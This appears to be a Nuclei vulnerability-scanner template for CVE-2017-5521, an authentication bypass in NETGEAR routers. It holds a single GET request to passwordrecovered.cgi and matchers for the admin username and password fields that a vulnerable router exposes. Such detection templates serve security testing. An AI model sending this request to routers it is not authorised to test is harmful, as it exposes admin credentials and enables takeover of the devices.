id: CVE-2017-5521 info: name: NETGEAR Routers - Authentication Bypass author: princechaddha severity: high description: NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server. reference: - https://www.cvedetails.com/cve/CVE-2017-5521/ - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/ - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability - http://web.archive.org/web/20210123212905/https://www.securityfocus.com/bid/95457/ - https://nvd.nist.gov/vuln/detail/CVE-2017-5521 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-5521 cwe-id: CWE-200 tags: cve,cve2017,auth-bypass,netgear requests: - method: GET path: - "{{BaseURL}}/passwordrecovered.cgi?id=nuclei" matchers-condition: and matchers: - type: word words: - "right\">Router\\s*Admin\\s*Username<" - "right\">Router\\s*Admin\\s*Password<" condition: and part: body - type: status status: - 200 # Enhanced by mp on 2022/06/19